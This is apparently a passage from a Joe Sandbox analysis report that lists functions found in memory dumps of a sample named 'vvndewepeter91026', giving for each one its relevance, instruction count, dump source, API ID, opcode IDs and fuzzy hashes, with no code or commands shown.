                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: aa179dafe8109ee4d137a8a7e3b989120a59320170e1a73233aae40028776cf0
                                                • Instruction ID: 64fe3d656bf02b677b7488e24cfa328e27d343021d5b0e1ab0b917ed0072a56c
                                                • Opcode Fuzzy Hash: aa179dafe8109ee4d137a8a7e3b989120a59320170e1a73233aae40028776cf0
                                                • Instruction Fuzzy Hash: FDC1B074E00218CFDB54DFA5D994B9DBBB2BF89300F2085AAD409AB355DB35AE81CF50
                                                Function 00C3D180 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3327011059687c2e454ba21e0cdb71d54d4e366d13e21a7c2bbbd50f175f0a10
                                                • Instruction ID: d88bc3ec746a65cf59635cc4eca4c3219743a538d0e81b5a58450ea4e7ccfb11
                                                • Opcode Fuzzy Hash: 3327011059687c2e454ba21e0cdb71d54d4e366d13e21a7c2bbbd50f175f0a10
                                                • Instruction Fuzzy Hash: 45C1B074E00218CFDB54DFA5D994B9DBBB2BF89300F2484AAD809AB355DB359E81CF50
                                                Function 00C35788 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b888ad1bc7c7482b19b7c322a498f2014e377a070db6b38cb4cf16decf5d47c1
                                                • Instruction ID: 4f6c9212f1388177f73725da180e5cf6155578720d7091196a3a16236d430b52
                                                • Opcode Fuzzy Hash: b888ad1bc7c7482b19b7c322a498f2014e377a070db6b38cb4cf16decf5d47c1
                                                • Instruction Fuzzy Hash: 1EC1A074E00218CFDB54DFA5C994B9DBBB2BF89300F2485AAD409AB395DB359E81CF50
                                                Function 00C36490 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1bcf5f94ade2fe4741d3fba043f53be28457d9d8f97f74005030b45613888f41
                                                • Instruction ID: 1d27c9fcb1d49a61da31c451394c3c389920f2f4011167199001f6cd44c16e1b
                                                • Opcode Fuzzy Hash: 1bcf5f94ade2fe4741d3fba043f53be28457d9d8f97f74005030b45613888f41
                                                • Instruction Fuzzy Hash: 3EC1B074E00218CFDB54DFA5C995B9DBBB2BF89300F2085AAD409AB395DB359E81CF50
                                                Function 00C37198 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8cb833ebe014049722509f6fb4ce8326c815f7950ceba5431c5170c6de20f79f
                                                • Instruction ID: e9ad777786e5e2268f0a3c6dbfede81b0e8c491c8c217ac3181c6679d4336f0a
                                                • Opcode Fuzzy Hash: 8cb833ebe014049722509f6fb4ce8326c815f7950ceba5431c5170c6de20f79f
                                                • Instruction Fuzzy Hash: 89C1B0B4E00218CFDB54DFA5C995B9DBBB2BF89300F2085AAD409AB355DB359E81CF50
                                                Function 00C37EA0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3b9d941ee5e3e4d213b1bd47c23b58db5b41928a930eeff87844b30a601f8c52
                                                • Instruction ID: 9b7e34819c1a2d68d21eec73e5ce211fe3841fc48ec91e555dffecca819d89a0
                                                • Opcode Fuzzy Hash: 3b9d941ee5e3e4d213b1bd47c23b58db5b41928a930eeff87844b30a601f8c52
                                                • Instruction Fuzzy Hash: 6DC1BF74E00218CFDB54DFA5C994B9EBBB2BF89300F2084AAD409AB355DB359E85CF50
                                                Function 00C38BA8 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 098ee160d9e59cba0fd5de14891557b4bfb2dddac30d1c253a974ceb38a22599
                                                • Instruction ID: ee1cd0eacfba828d3dac4638be47dd343bc547d03843dfb83962df68cb3b031e
                                                • Opcode Fuzzy Hash: 098ee160d9e59cba0fd5de14891557b4bfb2dddac30d1c253a974ceb38a22599
                                                • Instruction Fuzzy Hash: 79C1AF74E00318CFDB54DFA5C994B9DBBB2BF89300F2084A9E409AB355DB359A85CF50
                                                Function 00C398B0 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 81b9578cc8b6a3ea9439cd7ea0dc2b0f5161b16a177cae0fbb7f58d1cf7963da
                                                • Instruction ID: b0faf7da0c6754db8583fd7a7c58cf05115d3faf4ef60879533498eb613320d1
                                                • Opcode Fuzzy Hash: 81b9578cc8b6a3ea9439cd7ea0dc2b0f5161b16a177cae0fbb7f58d1cf7963da
                                                • Instruction Fuzzy Hash: C2C1AE74E00218CFDB14DFA5D994B9DBBB2BF89300F2085AAD409AB355DB359E81CF50
                                                Function 00C36D40 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a8c9c3c7fb3e096d6fb7ecc54246199259d0c70c56e7605cf05ae71e3ed41e8f
                                                • Instruction ID: 838299d5ee12a0f5bd5a46a72ab53b9e708ae2bb2c87f06fd6955c123cfa8206
                                                • Opcode Fuzzy Hash: a8c9c3c7fb3e096d6fb7ecc54246199259d0c70c56e7605cf05ae71e3ed41e8f
                                                • Instruction Fuzzy Hash: E3C1C074E00218CFDB14DFA5C995B9DBBB2BF89300F2085AAD409AB355DB359E85CF50
                                                Function 00C37A48 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f10f0d8ae59bcf6189c9cba7cb560ffb0e947848dbc6d411729850d6386842fc
                                                • Instruction ID: 849f0a9633f93b0fc0650cb86f6f14cc7c08a9137eb59ed5a4d4215eddd7fd71
                                                • Opcode Fuzzy Hash: f10f0d8ae59bcf6189c9cba7cb560ffb0e947848dbc6d411729850d6386842fc
                                                • Instruction Fuzzy Hash: 2DC1B0B4E00218CFDB54DFA5C995B9DBBB2BF89300F2085AAD409AB355DB359E81CF50
                                                Function 00C38750 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7c3911f33154742c23820b6f80f0c957faf44b42c71084d960ad7247e527e02a
                                                • Instruction ID: ca1e184068b7d7ecc2c5ccc341490af3e0d8616b560a1ca4c0cf6b4cb8b3fe8c
                                                • Opcode Fuzzy Hash: 7c3911f33154742c23820b6f80f0c957faf44b42c71084d960ad7247e527e02a
                                                • Instruction Fuzzy Hash: 2AC1A074E00318CFDB14DFA5C995BADBBB2BF89300F2085A9E409AB355DB359A85CF50
                                                Function 00C39458 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f27f1748605fe162f3d9b70800bbf79628068df4fc28a93cf768d9fdb1bb0c7f
                                                • Instruction ID: 9380e713401708bb7aab0ad44fa9f0d7336ea58bfceeba0e4ab63cb5b84a0ac3
                                                • Opcode Fuzzy Hash: f27f1748605fe162f3d9b70800bbf79628068df4fc28a93cf768d9fdb1bb0c7f
                                                • Instruction Fuzzy Hash: D4C1AF74E00218CFDB54DFA5C995B9DBBB2FF89300F2085AAD409AB395DB359A81CF50
                                                Function 00C3AA68 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cdc2de5776b8d1cb2d46343fb61341eae5b669c4731dbc2dc811e95926954613
                                                • Instruction ID: fef206f4a0528eb50007e69841c140453d86c6e169dd6db613e00ac6347b527c
                                                • Opcode Fuzzy Hash: cdc2de5776b8d1cb2d46343fb61341eae5b669c4731dbc2dc811e95926954613
                                                • Instruction Fuzzy Hash: C5C1BF74E00218CFDB54DFA5C994BADBBB2BF89300F2084AAD409AB355DB359E81CF50
                                                Function 00C33070 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0d8ccc3aad1f6917384e334b2d41a42c9edf4530e1974c90d1b7cd5b63ca8e1d
                                                • Instruction ID: 0ebbd3d72e131c6c039e18eb93b280d7474120f12938feb6a3f532715f05b1c1
                                                • Opcode Fuzzy Hash: 0d8ccc3aad1f6917384e334b2d41a42c9edf4530e1974c90d1b7cd5b63ca8e1d
                                                • Instruction Fuzzy Hash: 69C1C074E00218CFDB14DFA5C994B9EBBB2BF89300F2084AAD409AB355DB359E81CF50
                                                Function 00C3B770 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 07021f75d58574e1c400d0996559ba16bd18a9983fa91f91266584858fde9245
                                                • Instruction ID: b7e9c736ff87dbd8351d5df567f0c7a54b53b1c23379f48423c35becd31d7b1e
                                                • Opcode Fuzzy Hash: 07021f75d58574e1c400d0996559ba16bd18a9983fa91f91266584858fde9245
                                                • Instruction Fuzzy Hash: CEC1B074E00218CFDB54DFA5C995B9DBBB2BF89300F2484AAD409AB355DB359E81CF50
                                                Function 00C3C478 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2fa943f085e7a951c5737b6183c5c9abd6e42353f0203b96f7ef6f9b61410826
                                                • Instruction ID: db75124a3aaa8a1657d89390b743f069a9194959cdd3eda00383d2cfecd16418
                                                • Opcode Fuzzy Hash: 2fa943f085e7a951c5737b6183c5c9abd6e42353f0203b96f7ef6f9b61410826
                                                • Instruction Fuzzy Hash: C0C1B174E00218CFDB54DFA5C995B9DBBB2BF89300F2484AAD409AB395DB359E81CF50
                                                Function 00C33D78 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d4a3d2f62d2b757847a1e186df79d5205790cdea948f04b43e1cc234e0f2ac59
                                                • Instruction ID: 613b39bc9a3b0c1d8592a76b0ae882e9b62e0d94887a06d189024998e1eb8cd5
                                                • Opcode Fuzzy Hash: d4a3d2f62d2b757847a1e186df79d5205790cdea948f04b43e1cc234e0f2ac59
                                                • Instruction Fuzzy Hash: 24C1B074E00218CFDB54DFA5C994B9DBBB2BF89300F2485AAD409AB355DB35AE81CF50
                                                Function 00C39000 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 434aee99d27503f44ab4662b575d83f992afda689c3aab80030e785a33c9794b
                                                • Instruction ID: 54f518b29ab552f62d8176218eca192d0d58c23daac6bb24a779cd127dc449d5
                                                • Opcode Fuzzy Hash: 434aee99d27503f44ab4662b575d83f992afda689c3aab80030e785a33c9794b
                                                • Instruction Fuzzy Hash: DCC1AE74E00218CFDB54DFA5C995B9DBBB2FF89300F2084AAD409AB395DB359A81CF50
                                                Function 00C3B318 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4baedff293d3a15b083caf2fa19025d68184039ae20e9423878d89ac275441bf
                                                • Instruction ID: f85c5048729c1f6445d502a9364d5444f3fc9a5abcc1533236f7e9cf309cc9ae
                                                • Opcode Fuzzy Hash: 4baedff293d3a15b083caf2fa19025d68184039ae20e9423878d89ac275441bf
                                                • Instruction Fuzzy Hash: B6C1AF74E00218CFDB54DFA5C994BADBBB2BF89300F2484AAD409AB355DB359E81CF50
                                                Function 00C3C020 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 0738d652484a91ff83c12a291edd7bf7d19fa454c86b7637de61a68e1fb0a34e
                                                • Instruction ID: 203f11ee6b8af6ad58f2085481a63f8b68eeb6af837402461e560b4ce377ba31
                                                • Opcode Fuzzy Hash: 0738d652484a91ff83c12a291edd7bf7d19fa454c86b7637de61a68e1fb0a34e
                                                • Instruction Fuzzy Hash: FFC1C274E00218CFDB14DFA5C994BADBBB2BF89300F2484A9D409AB355DB359E81CF50
                                                Function 00C33920 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 031d0a992c6536238b300602c9b4b1904dcd4bc58b117c251fe61ce7c811a914
                                                • Instruction ID: ab434614321e309bb5ae407342827e6ce9a1df08d3cddac4c94e3889d0df8cf3
                                                • Opcode Fuzzy Hash: 031d0a992c6536238b300602c9b4b1904dcd4bc58b117c251fe61ce7c811a914
                                                • Instruction Fuzzy Hash: 01C1BF74E10218CFDB54DFA5C994BADBBB2BF89300F2084AAD409AB355DB359E81CF50
                                                Function 00C34628 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 39daaf43ce04f755f8f53fa13dc21e50376294a4d2b8eb614df49b8122a87149
                                                • Instruction ID: 039a3dc26024c9929422d564f5a43b23254939c5ef27b8623281816b7e7e9e08
                                                • Opcode Fuzzy Hash: 39daaf43ce04f755f8f53fa13dc21e50376294a4d2b8eb614df49b8122a87149
                                                • Instruction Fuzzy Hash: 85C1B174E00218CFDB54DFA5C995B9DBBB2BF89300F2084AAD409AB355DB35AE81CF50
                                                Function 00C3CD28 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d6ed6b27a64c2c9e6871245605749e635ecb73a4f96301d97b60d518f1394c3c
                                                • Instruction ID: 1f972a375d8808b51ea9bf360ed2cb2a96189a38a447f4c2121d8eee0675f86e
                                                • Opcode Fuzzy Hash: d6ed6b27a64c2c9e6871245605749e635ecb73a4f96301d97b60d518f1394c3c
                                                • Instruction Fuzzy Hash: 13C1C174E00218CFDB54DFA5D995B9DBBB2BF89300F2084AAD409AB355DB359E81CF50
                                                Function 00C3DA30 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3d277b554755667fb0afef8509d673b5c4e4ea78122b6ce049e7ba29dfafbd9e
                                                • Instruction ID: 1e4a2731b6ebf9fab5cd89f4d9d38b046260a43540bf11841487858b25d94191
                                                • Opcode Fuzzy Hash: 3d277b554755667fb0afef8509d673b5c4e4ea78122b6ce049e7ba29dfafbd9e
                                                • Instruction Fuzzy Hash: 67C1C074E00218CFDB14DFA5D994BADBBB2BF89300F2484AAD409AB355DB359E81CF50
                                                Function 00C35330 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e9a186cf51b0c39082920edbe9e06a9d60ce6e59a3f8d30850629a31b8bbaab4
                                                • Instruction ID: 5cdcc6445b76dcbdee584a859a811c5b2b78981186d1b3efbd7860e1729686f3
                                                • Opcode Fuzzy Hash: e9a186cf51b0c39082920edbe9e06a9d60ce6e59a3f8d30850629a31b8bbaab4
                                                • Instruction Fuzzy Hash: 0CC1B074E10218CFDB54DFA5C994BADBBB2BF89300F2484AAD409AB355DB359E81CF50
                                                Function 00C36038 Relevance: .3, Instructions: 268COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8f04d78f77ad8a90c624f07a5ec28e620e2205a02f53779bb0398a45d1874979
                                                • Instruction ID: 8146f08ef422a5ce2aaed3d4023d4b6ff374df706a944ab6934213a6816e286a
                                                • Opcode Fuzzy Hash: 8f04d78f77ad8a90c624f07a5ec28e620e2205a02f53779bb0398a45d1874979
                                                • Instruction Fuzzy Hash: 43C1B074E00218CFDB54DFA5C995B9DBBB2BF89300F2084AAD409AB355DB359E85CF50
                                                Function 00D65F31 Relevance: .2, Instructions: 249COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913756021.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_d60000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea58f077328e94eec153259b1c83a59d1a52678ca49d575c45209beec3774720
                                                • Instruction ID: 8b1aee77b785bbae04dbfc60a7d5f616bb91e3df35e730d75fa84d017a1cb91b
                                                • Opcode Fuzzy Hash: ea58f077328e94eec153259b1c83a59d1a52678ca49d575c45209beec3774720
                                                • Instruction Fuzzy Hash: 80917F75900318CFE714EFA0D8A87EEBBB5EB4A312F14952AE501772E8CB785A44CF54
                                                Function 00D65F38 Relevance: .2, Instructions: 247COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913756021.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_d60000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db917238da5e91fc1dfa1c03fa7b4754e71643beb26e6203f3c65c9255b3e7d3
                                                • Instruction ID: f3f217fce1d2de9250fcfcf77ae07f30dce66186cd1081ad6894b67a9900a9ff
                                                • Opcode Fuzzy Hash: db917238da5e91fc1dfa1c03fa7b4754e71643beb26e6203f3c65c9255b3e7d3
                                                • Instruction Fuzzy Hash: 2E916E75900318CFEB14EFA0D8A87EEBBB5EB4A312F14952AD501772E8CB785A44CF54
                                                Function 00D62B00 Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913756021.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_d60000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8da0237807b49e7672a0ce36cbbbe318556d516989d6d5acee441c772243eaa4
                                                • Instruction ID: a33bf1047521d9afd72090144a853e80fd4ec8dcb81aaad92a1caf2406cb7a91
                                                • Opcode Fuzzy Hash: 8da0237807b49e7672a0ce36cbbbe318556d516989d6d5acee441c772243eaa4
                                                • Instruction Fuzzy Hash: 79B1B774E00218CFDB54DFA9D884A9DBBB2FF88310F1481A9E819AB365DB31AD41CF50
                                                Function 00236D5A Relevance: .2, Instructions: 193COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913048420.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_230000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5849a328347d454452e6434abb483304013c084c2dceafce1e99a21ee5030003
                                                • Instruction ID: 7b8f82ed4d4cfbceea46d66cc00f5fece8d1cff4a8c523718947630a27a03591
                                                • Opcode Fuzzy Hash: 5849a328347d454452e6434abb483304013c084c2dceafce1e99a21ee5030003
                                                • Instruction Fuzzy Hash: DAA18E74A01228DFDB64DF64C894B9ABBB2BF8A304F5085EAD40DA7350DB759E81CF50
                                                Function 00D62AFC Relevance: .1, Instructions: 127COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913756021.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_d60000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8235b18b75389001bc07edc9d275a97dbe43229340c86f1547c65a6d3c97316f
                                                • Instruction ID: fc04a3fb8c7cca05eb589fdb1cac26f8f09a0cd8539e1903a50bf6257927f8d4
                                                • Opcode Fuzzy Hash: 8235b18b75389001bc07edc9d275a97dbe43229340c86f1547c65a6d3c97316f
                                                • Instruction Fuzzy Hash: 9C519674E00648CFDB48DFAAD58499DBBF2BF89300F24C169E419AB365DB34A942CF10
                                                Function 00236F39 Relevance: .1, Instructions: 116COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913048420.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_230000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6a6012cbaa261d00639e9943babaa974a1e1b48dafe816f8c30b2a286a6199f
                                                • Instruction ID: 07438b25af5a884e1771e63acd248ffe86a962b944a95b2897e9925c72eb30aa
                                                • Opcode Fuzzy Hash: f6a6012cbaa261d00639e9943babaa974a1e1b48dafe816f8c30b2a286a6199f
                                                • Instruction Fuzzy Hash: 05518574A05218CFDB64DF24C894BAEB7B2BF4A305F5099EAD409A7350CB75AE81CF50